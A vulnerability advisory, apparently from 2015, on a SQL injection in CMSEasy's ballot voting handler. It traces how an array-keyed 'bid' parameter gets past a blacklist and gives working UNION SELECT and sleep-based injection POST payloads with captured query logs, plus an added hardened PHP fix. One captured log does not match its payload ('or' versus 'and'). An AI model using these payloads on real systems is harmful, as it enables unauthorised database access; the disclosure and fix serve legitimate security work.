### Summary:
cmseasy: an improper fix leaves an unrestricted front-end select/union SQL injection
### Details:
Download the latest version and look at:
ballot_act.php:
```
function index_action() {
    if (front::post('submit')) {
        if (!front::post('ballot')) {
            front::alert(lang('Please_select_vote'));
            return false;
        }
        if (config::get('checkip')) {
            $time=cookie::get('vttime');
            if (time() -$time <config::get('timer') * 60) {
                front::alert(lang('You_have_voted'));
                return false;
            }
        }
        $bid=front::$post['bid'];
        if (is_array(front::$post['ballot'])) {
            $ids=implode(',',front::$post['ballot']);
        }
        else {
            $ids=front::$post['ballot'];
        }
        if(preg_match('/(select|union|and|\'|"|\))/i',$ids)){
            exit('非法参数');
        }
        if(preg_match('/(select|union|and|\'|"|\))/i',$bid)){
            exit('非法参数');
        }
        $where="id in($ids)";
        $data='num=num+1';
        $option=new option();
        $option->rec_update($data,$where);
        $this->_table->rec_update($data,$bid);
```
Here a first-pass blacklist filter is applied to the bid and ids variables.
On analysis the ids variable does have a weakness, but it is of little practical use and hard to work with, so let's turn to bid instead.
What happens if bid is an array?
rec_update:
```
function rec_update($row,$where) {
    $tbname=$this->name;
    $sql=$this->sql_update($tbname,$row,$where);
    //echo $sql."\n";
    return $this->query_unbuffered($sql);
}
```
Then follow into:
sql_update:
```
function sql_update($tbname,$row,$where) {
    //var_dump($row);
    $sqlud='';
    if (is_string($row))
        $sqlud = $row.' ';
    else
        foreach ($row as $key=>$value) {
            if (in_array($key,explode(',',$this->getcolslist()))) {
                $value=$value;
                /*if (preg_match('/^\[(.*)\]$/',$value,$match))
                    $sqlud .= "`$key`"."= '".$match[1]."',";
                else*/if ($value === "")
                    $sqlud .= "`$key`= NULL, ";
                else
                    $sqlud .= "`$key`"."= '".$value."',";
            }
        }
    $sqlud=rtrim($sqlud);
    $sqlud=rtrim($sqlud,',');
    $this->condition($where);
    $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where;
    //echo $sql;
    return $sql;
}
```
Then follow into the condition function:
```
function condition(&$condition) {
    if (isset($condition) &&is_array($condition)) {
        $_condition=array();
        foreach ($condition as $key=>$value) {
            //$value=str_replace("'","\'",$value);
            $key = htmlspecialchars($key,ENT_QUOTES);
            $_condition[]="`$key`='$value'";
        }
        $condition=implode(' and ',$_condition);
    }
}
```
htmlspecialchars does not escape the backtick that delimits the key, so this is yet another self-deceiving check.
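The root causes visible in the code above are that the controller accepts `bid` whether it is a string or an array, that the keyword blacklist is the only check, and that `condition()` builds the WHERE clause by interpolating array keys (run through htmlspecialchars, which leaves the backtick alone) and values (the `str_replace` escaping is commented out). The following is an added example of how a defender would close both gaps; it is not cmseasy's own code. It assumes a known column list for the ballot table (the constructed `BALLOT_COLUMNS` stands in for `getcolslist()`) and returns a parameterised WHERE fragment for use with a prepared statement instead of a finished SQL string.

```php
<?php
// Added example (not cmseasy code): hardened replacements for the controller
// check on bid/ballot and for the condition() helper shown above.
// Assumption: the table's column list is known; BALLOT_COLUMNS is a constructed
// stand-in for $this->getcolslist().

const BALLOT_COLUMNS = ['id', 'num', 'title'];

/**
 * Controller-side check: bid must be a plain string of digits.
 * An array (bid[...]=...) or any non-digit input is rejected outright, so no
 * SQL fragment can ride along as an array key.
 */
function parse_bid($bid): int
{
    if (!is_string($bid) || !ctype_digit($bid)) {
        throw new InvalidArgumentException('bid must be a positive integer');
    }
    return (int)$bid;
}

/**
 * ballot may be a list of ids or a comma-separated id string (as in the
 * original controller). Every element must be all digits; returns int[]
 * suitable for building "id IN (...)" from integers only.
 */
function parse_ballot($ballot): array
{
    $parts = is_array($ballot) ? $ballot : explode(',', (string)$ballot);
    $ids = [];
    foreach ($parts as $p) {
        if (!is_string($p) || !ctype_digit($p)) {
            throw new InvalidArgumentException('ballot ids must be positive integers');
        }
        $ids[] = (int)$p;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no ballot ids given');
    }
    return $ids;
}

/**
 * Hardened condition(): keys are checked against the column whitelist instead
 * of being passed through htmlspecialchars, and values become bound parameters
 * instead of being interpolated. Returns [where_fragment, params].
 */
function safe_condition(array $condition): array
{
    $clauses = [];
    $params  = [];
    foreach ($condition as $key => $value) {
        // strict comparison: an integer key never matches a column name
        if (!in_array($key, BALLOT_COLUMNS, true)) {
            throw new InvalidArgumentException("unknown column: $key");
        }
        $clauses[] = "`$key` = ?";
        $params[]  = $value;
    }
    return [implode(' AND ', $clauses), $params];
}

// Demonstration with constructed input (no database needed).
$ids = parse_ballot('1,2,3,4');                      // [1, 2, 3, 4]
$bid = parse_bid('7');                               // 7
[$where, $params] = safe_condition(['id' => $bid]);
echo "UPDATE `cmseasy_ballot` SET num=num+1 WHERE id IN (", implode(',', $ids), ")\n";
echo "UPDATE `cmseasy_ballot` SET num=num+1 WHERE $where  -- params: ", json_encode($params), "\n";

// The array-keyed bid from the report is rejected at both layers.
$hostile = ['num`=1 or sleep/**/(5)#' => 'xxxxxxxxxxxxxxxxxx'];
foreach (['parse_bid', 'safe_condition'] as $check) {
    try {
        $check($hostile);
    } catch (InvalidArgumentException $e) {
        echo "$check rejected: ", $e->getMessage(), "\n";
    }
}
```

The whitelist on column names is what the original `htmlspecialchars` call was standing in for; together with integer-only ids and bound values, neither the array key nor the value can reach the SQL text, so the blacklist regex in `index_action()` becomes unnecessary rather than something to keep extending.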
We request:
http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index:
POST data:
submit=xx&ballot=1,2,3,4&bid[xxx%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=xxxxxxxxxxxxxxxxxx
Here we only want to see whether the payload is carried into the query:
Captured:
![58.png](https://images.seebug.org/upload/201501/2713003607751c35455508b56e7ebf8796a85d92.png)
2015/1/27 12:54 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `xxx`=1 UNION SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1#`='xxxxxxxxxxxxxxxxxx'
See that? The injection is unrestricted. A quick check with a time-based injection:
http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index
POST data:
submit=xx&ballot=1,2,3,4&bid[num%60%3d1%20or%20sleep/**/(5)%23]=xxxxxxxxxxxxxxxxxx
Captured:
2015/1/27 13:04 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `num`=1 and sleep/**/(5)#`='xxxxxxxxxxxxxxxxxx'
Executed successfully.
### Proof of vulnerability: